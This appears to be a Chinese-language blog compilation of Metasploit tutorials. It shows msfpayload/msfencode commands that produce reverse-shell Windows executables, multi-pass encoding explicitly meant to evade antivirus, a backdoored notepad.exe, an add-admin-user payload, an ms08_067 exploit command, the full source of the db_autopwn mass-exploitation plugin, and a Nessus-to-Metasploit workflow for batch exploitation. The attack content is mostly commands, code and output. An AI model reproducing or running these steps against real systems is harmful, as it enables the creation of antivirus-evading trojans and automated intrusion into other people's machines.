metasploit->msfencoding 一次加密多次加密,免杀。

[bash]

root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai  -t exe > /var/www/payload2.exe
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
|
root@bt:/# file /var/www/payload2.exe
/var/www/2.exe: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
We add the R flag at to the msfpayload command line to specify raw
output, because we will pipe its output directly into msfencode. We specify the
x86/shikata_ga_nai encoder at
and tell msfencode to send the executable out-
put -t exe to /var/www/payload2.exe. Finally, we run a quick check at to
ensure that the resulting file is in fact a Windows executable. The response
tells us that it is. Unfortunately, after the payload2.exe file is copied over to the
Windows system, AVG detects our encoded payload yet again, as shown :

[/bash]

R : 指定payload输出raw数据因为要加密,
payload的选择以及参数设置不用说. |为管道.  -e 后面是msfencode的加密方法, -t exe为msfencode的输出类型.

>后面是输出文件的路径

这是一次加密。多次加密如下:

[bash]

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5
-t raw
| msfencode -e x86/alpha_upper -c 2
-t raw | msfencode -e
x86/shikata_ga_nai -c 5
-t raw | msfencode -e x86/countdown -c 5
-t exe -o /var/www/payload3.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 372 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 399 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 426 (iteration=5)
[*] x86/alpha_upper succeeded with size 921 (iteration=1)
[*] x86/alpha_upper succeeded with size 1911 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1940 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 1969 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 1998 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 2027 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 2056 (iteration=5)
[*] x86/countdown succeeded with size 2074 (iteration=1)
[*] x86/countdown succeeded with size 2092 (iteration=2)
[*] x86/countdown succeeded with size 2110 (iteration=3)
[*] x86/countdown succeeded with size 2128 (iteration=4)
[*] x86/countdown succeeded with size 2146 (iteration=5)
root@bt:/opt/framework3/msf3#
Here we use five counts at of shikata_ga_nai, feeding the code in raw
format at into two counts of alpha_upper encoding at , which is then fed
to another five counts of shikata_ga_nai ,followed by five counts of countdown
encoding at , before finally directing the output into the desired execut-
able. We are using a total of 17 encoding loops in an attempt to circumvent
the antivirus software. And, as you can see in Figure 7-3, we have successfully
slipped our payload past the antivirus engine.

[/bash]

明显拉。多次加密就是加密多次。。。。。。。。<—-废话

但是要保证除最后一次生成需要的文件类型之外,中间管道的输入数据类型都必须是RAW数据。

msfpayload输出raw数据使用参数R.  msfencode输出raw数据使用参数 -t raw

在上文的例子中,每一加密都加密了多轮。 使用-c 参数进行控制。

最后附带上msfencode的help. help里面有详细参数说明哦.

[bash]

root@bt:~# msfencode -h

Usage: /opt/metasploit/msf3/msfencode <options>

OPTIONS:

-a <opt>  The architecture to encode as
-b <opt>  The list of characters to avoid: ‘\x00\xff’
-c <opt>  The number of times to encode the data
-d <opt>  Specify the directory in which to look for EXE templates
-e <opt>  The encoder to use
-h        Help banner
-i <opt>  Encode the contents of the supplied file path
-k        Keep template working; run payload in new thread (use with -x)
-l        List available encoders
-m <opt>  Specifies an additional module search path
-n        Dump encoder information
-o <opt>  The output file
-p <opt>  The platform to encode for
-s <opt>  The maximum size of the encoded data
-t <opt>  The output format: raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,aspx,war,psh,psh-net
-v        Increase verbosity
-x <opt>  Specify an alternate executable template

root@bt:~#

[/bash]

用Metasploit Framework给EXE文件加后门

官方网站 www.metasploit.com

大多来自 http://www.linux520.com/  感谢beach老师的无私奉献

http://www.linux520.com/v/l00047/l00047.html
http://www.irongeek.com/videos/msfpayload-msfencoder-metasploit-3-3.swf   这个两个视频都是比较有用的.
===================
msfpayload   msfencode      msfcli

===================
msfpayload -h

 Usage: /msf3/msfpayload <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]avascript|e[X]ecutable|[V]BA|[W]ar>

msfpayload windows/shell/reverse_tcp LHOST=192.168.1.13 LPORT=4455  R |  msfencode  -k -x  notepad.exe -t  exe  -e x86/shikata_ga_nai   -c 5 -o  diy_notepad.exe

msfcli exploit/multi/handler payload=windows/shell/reverse_tcp lhost=192.168.1.13 lport=4455  E

=====================

msfpayload  windows/adduser pass=123123 user=admin x >diy_user_add.exe 生成可执行文件

chmod +x diy_user_add.exe      添加此文件的执行权限(默认生成是没有执行权限的)

===============
$ msfcli -h
Usage: /msf3/msfcli <exploit_name> <option=value> [mode]

/msf3/msfcli <exploit_name> <payload_name> t(target) o(option)
========================================================

Mode          Description
—-           ———–
(H)elp         You’re looking at it baby!
(S)ummary      Show information about this module
(O)ptions      Show available options for this module
(A)dvanced     Show available advanced options for this module
(I)DS Evasion  Show available ids evasion options for this module
(P)ayloads     Show available payloads for this module
(T)argets      Show available targets for this exploit module
(AC)tions      Show available actions for this auxiliary module
(C)heck        Run the check routine of the selected module
(E)xecute      Execute the selected module

msfcli windows/smb/ms08_067_netapi payload=windows/shell/bind_tcp target=1 RHOST=192.168.1.13 LPORT=5555

db_autopwn.rb

压缩包下载:
db_autopwn
也可以直接复制下文保存为db_autopwn.rb 然后放到msf的plugins目录下即可。
使用时:
load db_autopwn
之后使用。


#
# db_autopwn - stripped from previous db commands and modified into a plugin as autopwn has been
#        pulled from the mainline release.
#
#        Issues/Bugs should go to neinwechter via GitHub
#


module Msf

class Plugin::DBAutopwn < Msf::Plugin
class DBAutopwnCommandDispatcher
include Msf::Ui::Console::CommandDispatcher

#
# Constants
#

PWN_SHOW = 2**0
PWN_XREF = 2**1
PWN_PORT = 2**2
PWN_EXPL = 2**3
PWN_SING = 2**4
PWN_SLNT = 2**5
PWN_VERB = 2**6

def name
"db_autopwn"
end

def commands
{
"db_autopwn" => "Automatically exploit everything",
}
end

#
# Returns true if the db is connected, prints an error and returns
# false if not.
#
# All commands that require an active database should call this before
# doing anything.
#
def active?
if not framework.db.active
print_error("Database not connected")
return false
end
true
end

#
# A shotgun approach to network-wide exploitation
# Officially deprecated as of 4.1
#
# Forked for those who still want it and understand it's limitations/issues
#

def cmd_db_autopwn(*args)
return unless active?

print_error("")
print_error("Warning: The db_autopwn command is not officially supported and exists only in a branch.")
print_error("         This code is not well maintained, crashes systems, and crashes itself.")
print_error("         Use only if you understand it's current limitations/issues.")
print_error("         Minimal support and development via neinwechter on GitHub metasploit fork.")
print_error("")

stamp = Time.now.to_f
vcnt  = 0
rcnt  = 0
mode  = 0
code  = :bind
mjob  = 5
regx  = nil
minrank = nil
maxtime = 120

port_inc = []
port_exc = []

targ_inc = []
targ_exc = []

args.push("-h") if args.length == 0

while (arg = args.shift)
case arg
when '-t'
mode |= PWN_SHOW
when '-x'
mode |= PWN_XREF
when '-p'
mode |= PWN_PORT
when '-e'
mode |= PWN_EXPL
when '-s'
mode |= PWN_SING
when '-q'
mode |= PWN_SLNT
when '-v'
mode |= PWN_VERB
when '-j'
mjob = args.shift.to_i
when '-r'
code = :conn
when '-b'
code = :bind
when '-I'
tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
range = args.shift
if not tmpopt.valid?(range)
print_error("Invalid range for -I")
return
end
targ_inc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
when '-X'
tmpopt = OptAddressRange.new('TEMPRANGE', [ true, '' ])
range = args.shift
if not tmpopt.valid?(range)
print_error("Invalid range for -X")
return
end
targ_exc << Rex::Socket::RangeWalker.new(tmpopt.normalize(range))
when '-PI'
port_inc = Rex::Socket.portspec_to_portlist(args.shift)
when '-PX'
port_exc = Rex::Socket.portspec_to_portlist(args.shift)
when '-m'
regx = args.shift
when '-R'
minrank = args.shift
when '-T'
maxtime = args.shift.to_f
when '-h','--help'
print_status("Usage: db_autopwn [options]")
print_line("\t-h          Display this help text")
print_line("\t-t          Show all matching exploit modules")
print_line("\t-x          Select modules based on vulnerability references")
print_line("\t-p          Select modules based on open ports")
print_line("\t-e          Launch exploits against all matched targets")
#                    print_line("\t-s          Only obtain a single shell per target system (NON-FUNCTIONAL)")
print_line("\t-r          Use a reverse connect shell")
print_line("\t-b          Use a bind shell on a random port (default)")
print_line("\t-q          Disable exploit module output")
print_line("\t-R  [rank]  Only run modules with a minimal rank")
print_line("\t-I  [range] Only exploit hosts inside this range")
print_line("\t-X  [range] Always exclude hosts inside this range")
print_line("\t-PI [range] Only exploit hosts with these ports open")
print_line("\t-PX [range] Always exclude hosts with these ports open")
print_line("\t-m  [regex] Only run modules whose name matches the regex")
print_line("\t-T  [secs]  Maximum runtime for any exploit in seconds")
print_line("")
return
end
end

minrank = minrank || framework.datastore['MinimumRank'] || 'manual'
if ! RankingName.values.include?(minrank)
print_error("MinimumRank invalid!  Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
return
else
minrank = RankingName.invert[minrank]
end

# Default to quiet mode
if (mode & PWN_VERB == 0)
mode |= PWN_SLNT
end

matches    = {}
refmatches = {}

# Pre-allocate a list of references and ports for all exploits
mrefs  = {}
mports = {}
mservs = {}

# A list of jobs we spawned and need to wait for
autopwn_jobs = []

[ [framework.exploits, 'exploit' ], [ framework.auxiliary, 'auxiliary' ] ].each do |mtype|
mtype[0].each_module do |modname, mod|
o = mod.new

if(mode & PWN_XREF != 0)
o.references.each do |r|
next if r.ctx_id == 'URL'
ref = r.ctx_id + "-" + r.ctx_val
ref.upcase!

mrefs[ref] ||= {}
mrefs[ref][o.fullname] = o
end
end

if(mode & PWN_PORT != 0)
if(o.datastore['RPORT'])
rport = o.datastore['RPORT']
mports[rport.to_i] ||= {}
mports[rport.to_i][o.fullname] = o
end

if(o.respond_to?('autofilter_ports'))
o.autofilter_ports.each do |rport|
mports[rport.to_i] ||= {}
mports[rport.to_i][o.fullname] = o
end
end

if(o.respond_to?('autofilter_services'))
o.autofilter_services.each do |serv|
mservs[serv] ||= {}
mservs[serv][o.fullname] = o
end
end
end
end
end


begin

framework.db.hosts.each do |host|
xhost = host.address
next if (targ_inc.length > 0 and not range_include?(targ_inc, xhost))
next if (targ_exc.length > 0 and range_include?(targ_exc, xhost))

if(mode & PWN_VERB != 0)
print_status("Scanning #{xhost} for matching exploit modules...")
end

#
# Match based on vulnerability references
#
if (mode & PWN_XREF != 0)

host.vulns.each do |vuln|

# Faster to handle these here
serv = vuln.service
xport = xprot = nil

if(serv)
xport = serv.port
xprot = serv.proto
end

vuln.refs.each do |ref|
mods = mrefs[ref.name.upcase] || {}
mods.each_key do |modname|
mod = mods[modname]
next if minrank and minrank > mod.rank
next if (regx and mod.fullname !~ /#{regx}/)

if(xport)
next if (port_inc.length > 0 and not port_inc.include?(serv.port.to_i))
next if (port_exc.length > 0 and port_exc.include?(serv.port.to_i))
else
if(mod.datastore['RPORT'])
next if (port_inc.length > 0 and not port_inc.include?(mod.datastore['RPORT'].to_i))
next if (port_exc.length > 0 and port_exc.include?(mod.datastore['RPORT'].to_i))
end
end

next if (regx and mod.fullname !~ /#{regx}/)

mod.datastore['RPORT'] = xport if xport
mod.datastore['RHOST'] = xhost

filtered = false
begin
::Timeout.timeout(2, ::RuntimeError) do
filtered = true if not mod.autofilter()
end
rescue ::Interrupt
raise $!
rescue ::Timeout::Error
filtered = true
rescue ::Exception
filtered = true
end
next if filtered

matches[[xport,xprot,xhost,mod.fullname]]=true
refmatches[[xport,xprot,xhost,mod.fullname]] ||= []
refmatches[[xport,xprot,xhost,mod.fullname]] << ref.name
end
end
end
end

#
# Match based on open ports
#
if (mode & PWN_PORT != 0)
host.services.each do |serv|
next if not serv.host
next if (serv.state != ServiceState::Open)

xport = serv.port.to_i
xprot = serv.proto
xname = serv.name

next if xport == 0

next if (port_inc.length > 0 and not port_inc.include?(xport))
next if (port_exc.length > 0 and port_exc.include?(xport))

mods = mports[xport.to_i] || {}

mods.each_key do |modname|
mod = mods[modname]
next if minrank and minrank > mod.rank
next if (regx and mod.fullname !~ /#{regx}/)
mod.datastore['RPORT'] = xport
mod.datastore['RHOST'] = xhost

filtered = false
begin
::Timeout.timeout(2, ::RuntimeError) do
filtered = true if not mod.autofilter()
end
rescue ::Interrupt
raise $!
rescue ::Exception
filtered = true
end

next if filtered
matches[[xport,xprot,xhost,mod.fullname]]=true
end

mods = mservs[xname] || {}
mods.each_key do |modname|
mod = mods[modname]
next if minrank and minrank > mod.rank
next if (regx and mod.fullname !~ /#{regx}/)
mod.datastore['RPORT'] = xport
mod.datastore['RHOST'] = xhost

filtered = false
begin
::Timeout.timeout(2, ::RuntimeError) do
filtered = true if not mod.autofilter()
end
rescue ::Interrupt
raise $!
rescue ::Exception
filtered = true
end

next if filtered
matches[[xport,xprot,xhost,mod.fullname]]=true
end
end
end
end

rescue ::Exception => e
print_status("ERROR: #{e.class} #{e} #{e.backtrace}")
return
end

if (mode & PWN_SHOW != 0)
print_status("Analysis completed in #{(Time.now.to_f - stamp).to_i} seconds (#{vcnt} vulns / #{rcnt} refs)")
print_status("")
print_status("=" * 80)
print_status(" " * 28 + "Matching Exploit Modules")
print_status("=" * 80)

matches.each_key do |xref|
mod = nil
if ((mod = framework.modules.create(xref[3])) == nil)
print_status("Failed to initialize #{xref[3]}")
next
end

if (mode & PWN_SHOW != 0)
tport = xref[0] || mod.datastore['RPORT']
if(refmatches[xref])
print_status("  #{xref[2]}:#{tport}  #{xref[3]}  (#{refmatches[xref].join(", ")})")
else
print_status("  #{xref[2]}:#{tport}  #{xref[3]}  (port match)")
end
end

end
print_status("=" * 80)
print_status("")
print_status("")
end

ilog("db_autopwn: Matched #{matches.length} modules")

idx = 0
matches.each_key do |xref|

idx += 1

begin
mod = nil

if ((mod = framework.modules.create(xref[3])) == nil)
print_status("Failed to initialize #{xref[3]}")
next
end

#
# The code is just a proof-of-concept and will be expanded in the future
#
if (mode & PWN_EXPL != 0)

mod.datastore['RHOST'] = xref[2]

if(xref[0])
mod.datastore['RPORT'] = xref[0].to_s
end

if (code == :bind)
mod.datastore['LPORT']   = (rand(0x8fff) + 4000).to_s
if(mod.fullname =~ /\/windows\//)
mod.datastore['PAYLOAD'] = 'windows/meterpreter/bind_tcp'
else
mod.datastore['PAYLOAD'] = 'generic/shell_bind_tcp'
end
end

if (code == :conn)
mod.datastore['LHOST']   =     Rex::Socket.source_address(xref[2])
mod.datastore['LPORT']   =     (rand(0x8fff) + 4000).to_s

if (mod.datastore['LHOST'] == '127.0.0.1')
print_status("Failed to determine listener address for target #{xref[2]}...")
next
end

if(mod.fullname =~ /\/windows\//)
mod.datastore['PAYLOAD'] = 'windows/meterpreter/reverse_tcp'
else
mod.datastore['PAYLOAD'] = 'generic/shell_reverse_tcp'
end
end


if(framework.jobs.keys.length >= mjob)
print_status("Job limit reached, waiting on modules to finish...")
while(framework.jobs.keys.length >= mjob)
::IO.select(nil, nil, nil, 0.25)
end
end

print_status("(#{idx}/#{matches.length} [#{framework.sessions.length} sessions]): Launching #{xref[3]} against #{xref[2]}:#{mod.datastore['RPORT']}...")

autopwn_jobs << framework.threads.spawn("AutoPwnJob#{xref[3]}", false, mod) do |xmod|
begin
stime = Time.now.to_f
::Timeout.timeout(maxtime) do
inp = (mode & PWN_SLNT != 0) ? nil : driver.input
out = (mode & PWN_SLNT != 0) ? nil : driver.output

case xmod.type
when MODULE_EXPLOIT
xmod.exploit_simple(
'Payload'        => xmod.datastore['PAYLOAD'],
'LocalInput'     => inp,
'LocalOutput'    => out,
'RunAsJob'       => false)
when MODULE_AUX
xmod.run_simple(
'LocalInput'     => inp,
'LocalOutput'    => out,
'RunAsJob'       => false)
end
end

rescue ::Timeout::Error
print_status(" >> autopwn module timeout from #{xmod.fullname} after #{Time.now.to_f - stime} seconds")
rescue ::Exception
print_status(" >> autopwn exception during launch from #{xmod.fullname}: #{$!} ")
end
end
end

rescue ::Interrupt
raise $!

rescue ::Exception
print_status(" >> autopwn exception from #{xref[3]}: #{$!} #{$!.backtrace}")
end
end

# Wait on all the jobs we just spawned
while (not autopwn_jobs.empty?)
# All running jobs are stored in framework.jobs.  If it's
# not in this list, it must have completed.
autopwn_jobs.delete_if { |j| not j.alive? }

print_status("(#{matches.length}/#{matches.length} [#{framework.sessions.length} sessions]): Waiting on #{autopwn_jobs.length} launched modules to finish execution...")
::IO.select(nil, nil, nil, 5.0)
end

if (mode & PWN_SHOW != 0 and mode & PWN_EXPL != 0)
print_status("The autopwn command has completed with #{framework.sessions.length} sessions")
if(framework.sessions.length > 0)
print_status("Enter sessions -i [ID] to interact with a given session ID")
print_status("")
print_status("=" * 80)
driver.run_single("sessions -l -v")
print_status("=" * 80)
end
end
print_line("")
# EOM
end










##############################
##############################

end

def initialize(framework, opts)
super
add_console_dispatcher(DBAutopwnCommandDispatcher)
end

def cleanup
remove_console_dispatcher('db_autopwn')
end

def name
"db_autopwn"
end

def desc
"Automatically exploit everything"
end

end
end

metasploit db_autopwn & load nessus

Author:bugcx or Anonymous
Url:http://blog.bug.cx/2012/04/16/metasploit-db_autopwn-load-nessus/ | bugcx’s blog | 关注网络安全

(撸一撸)
root@bt:~# msfconsole
  +——————————————————-+
  |  METASPLOIT by Rapid7                                 |
  +—————————+—————————+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |””””””””””””|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +—————————+—————————+
  |      o O o                |        \’\/\/\/’/         |
  |              o O          |         )======(          |
  |                 o         |       .’  LOOT  ‘.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |””\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)”””**|(@)(@)**|(@) |    ”       ||       ”     |
  |  = = = = = = = = = = = =  |     ‘————–‘      |
  +—————————+—————————+
       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ — –=[ 831 exploits – 470 auxiliary – 143 post
+ — –=[ 250 payloads – 27 encoders – 8 nops
       =[ svn r15107 updated yesterday (2012.04.14)
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[*]
Command                    Help Text
——-                    ———
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
—————–          —————–
Generic Commands
Plugin Commands
Policy Commands
Reports Commands
Scan Commands
User Commands
nessus_admin               Checks if user is an admin
nessus_connect             Connect to a nessus server
nessus_find_targets        Try to find vulnerable targets from a report
nessus_help                Listing of available nessus commands
nessus_logout              Logout from the nessus server
nessus_plugin_details      List details of a particular plugin
nessus_plugin_family       List plugins in a family
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_policy_del          Delete a policy
nessus_policy_list         List all polciies
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_host_detail  Detail from a report item on a host
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_hosts        Get list of hosts from a report
nessus_report_list         List all Nessus reports
nessus_save                Save nessus login info between sessions
nessus_scan_new            Create new Nessus Scan
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
nessus_scan_status         List all currently running Nessus scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_server_feed         Nessus Feed Type
nessus_server_prefs        Display Server Prefs
nessus_server_status       Check the status of your Nessus Server
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_list           Show Nessus Users
nessus_user_passwd         Change Nessus Users Password
[*]

连接上nessus

msf > nessus_connect fuckyou:123456@192.168.8.9 ok
[*] Connecting to https://192.168.8.9:8834/ as fuckyou
[*] Authenticated
msf >

nessus user添加一个nessus用户

msf > nessus_user_add
[*] Usage:
[*] nessus_user_add <username> <password>
[*] Only adds non admin users
msf > nessus_user_add xxxooo 123456
[+] xxxooo has been added

查看用户列表

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
—-     ———  ———-
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   FALSE      08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970

我们发现 xxxooo不是admin 我们提升为admin

root@bt:/opt/nessus/sbin# ./nessus-admin
Login : xxxooo
xxxooo is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
xxxooo is now an administrator
root@bt:/opt/nessus/sbin#

现在在来看看user

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
—-     ———  ———-
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   TRUE       08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
msf >

选择一种扫描规则

msf > nessus_policy_list
[+] Nessus Policy List
[+]
ID  Name                                         Comments
—  —-                                         ——–
-1  Prepare for PCI-DSS audits (section 11.2.2)
-2  Web App Tests
-3  External Network Scan
-4  Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 fuck 192.168.8.5
[*] Creating scan from policy number -2, called “fuck” and scanning 192.168.8.5
[*] Scan started.  uid is a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd

查看扫描状态

msf > nessus_scan_status
[+] Running Scans
[+]
Scan ID                                               Name  Owner    Started            Status   Current Hosts  Total Hosts
——-                                               —-  —–    ——-            ——   ————-  ———–
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  fuckyou  05:40 Apr 16 2012  running  0              1
[+]
[*] You can:
[+]         Import Nessus report to database :  nessus_report_get <reportid>
[+]         Pause a nessus scan :           nessus_scan_pause <scanid>
msf >

查看扫描报告列表

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  running    06:04 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

扫描完之后status会completed

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
—                                                    —-  ——     —-
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

查询指定扫描报告详细

msf > nessus_report_hosts 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Report Info
[+]
Hostname     Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
——–     ——–  —–  —–  —–  —–  —————-  ————–
192.168.8.1  19        8      19     0      0      48026             48026
192.168.8.2  25        8      24     1      0      48026             48026
192.168.8.3  29        8      28     1      0      48026             48026
192.168.8.4  25        6      24     1      0      48026             48026
192.168.8.5  66        13     56     4      6      48026             48026
192.168.8.6  20        6      19     1      0      48026             48026
192.168.8.7  387       13     84     49     254    48026             48026
192.168.8.8  64        5      47     8      9      48026             48026
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>
msf >

列出指定IP的扫描结果

msf > nessus_report_host_ports 192.168.8.7 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Host Info
[+]
Port  Protocol  Severity  Service Name   Sev 0  Sev 1  Sev 2  Sev 3
—-  ——–  ——–  ————   —–  —–  —–  —–
0     icmp      1         general        0      2      0      0
0     tcp       1         general        0      21     0      0
0     udp       1         general        0      1      0      0
123   udp       1         ntp?           1      1      0      0
135   tcp       1         epmap          1      2      0      0
137   udp       1         netbios-ns     1      2      0      0
138   udp       1         netbios-dgm?   1      1      0      0
139   tcp       1         smb            1      2      0      0
445   udp       1         microsoft-ds?  1      1      0      0
445   tcp       3         cifs           1      26     42     253
500   udp       1         isakmp?        1      1      0      0
1025  tcp       1         dce-rpc        1      2      0      0
1041  tcp       1         dce-rpc        1      2      0      0
3389  tcp       3         msrdp          1      3      2      1
3790  tcp       2         www            1      16     5      0
4500  udp       1         ipsec-nat-t?   1      1      0      0
[*] You can:
[*]         Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>
msf >

查看指定IP地址指定端口扫描详细

msf > nessus_report_host_detail 192.168.8.7 3389 tcp 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Port Info
[+]
Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
—-              ——–  ——–  ———–                                                                                                     —–  ——–  —                ———–  ———–
msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
msrdp (3389/tcp)  1         10940     Windows Terminal Services Enabled                                                                               none   .         []                 None         .
msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  1         30218     Terminal Services Encryption Level is not FIPS-140 Compliant                                                    2.6    .         []                 Low          CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      [“CVE-2005-1794”]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      [“CVE-2012-0002”]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
msf >

导入一个扫描报告

msf > nessus_report_get
[*] Usage:
[*]        nessus_report_get <report id>
[*]        use nessus_report_list to list all available reports for importing
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.9
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

查看扫描结果hosts

msf > hosts -c address,os_name,os_flavor,os_sp,vulns
Hosts
=====
address       os_name                   os_flavor  os_sp  vulns
——-       ——-                   ———  —–  —–
10.0.2.15     Microsoft Windows         XP         SP3    0
192.168.8.1   Linux                                       17
192.168.8.2   Microsoft Windows         7                 17
192.168.8.3   Microsoft Windows         2003       SP2    21
192.168.8.4   Microsoft Windows         7                 17
192.168.8.5   Microsoft Windows         2003       SP2    289
192.168.8.6   Microsoft Windows         XP                20
192.168.8.7   Microsoft Windows         2003       SP2    369
192.168.8.8   Linux  3.2.6 on Ubuntu 1                    48

查看扫描到的主机漏洞

msf > vulns
[*] Time: 2012-04-16 06:14:35 UTC Vuln: host=192.168.8.7 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Windows Summary of Missing Patches refs=NSS-38153
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Office Detection refs=NSS-27524
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Device Type refs=NSS-54615
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=OS Identification refs=NSS-11936
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : Disabled accounts refs=OSVDB-752,NSS-10913
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : Passwords never expire refs=OSVDB-755,NSS-10916
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows – Local Users Information : User has never logged on refs=OSVDB-754,NSS-10915

…….略

我们也可以是用auto_exploit进行批量溢出
开启postgresql 创建一个数据库

root@bt:/opt/nessus/sbin# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server
root@bt:~# psql -U postgres -h localhost
用户 postgres 的口令:
psql (8.4.10)
SSL连接 (加密:DHE-RSA-AES256-SHA,位元:256)
输入 “help” 来获取帮助信息.
postgres=# CREATE DATABASE fuck;
CREATE DATABASE
postgres=#

msf连接postgresql

msf > db_status
[*] postgresql connected to msf3dev
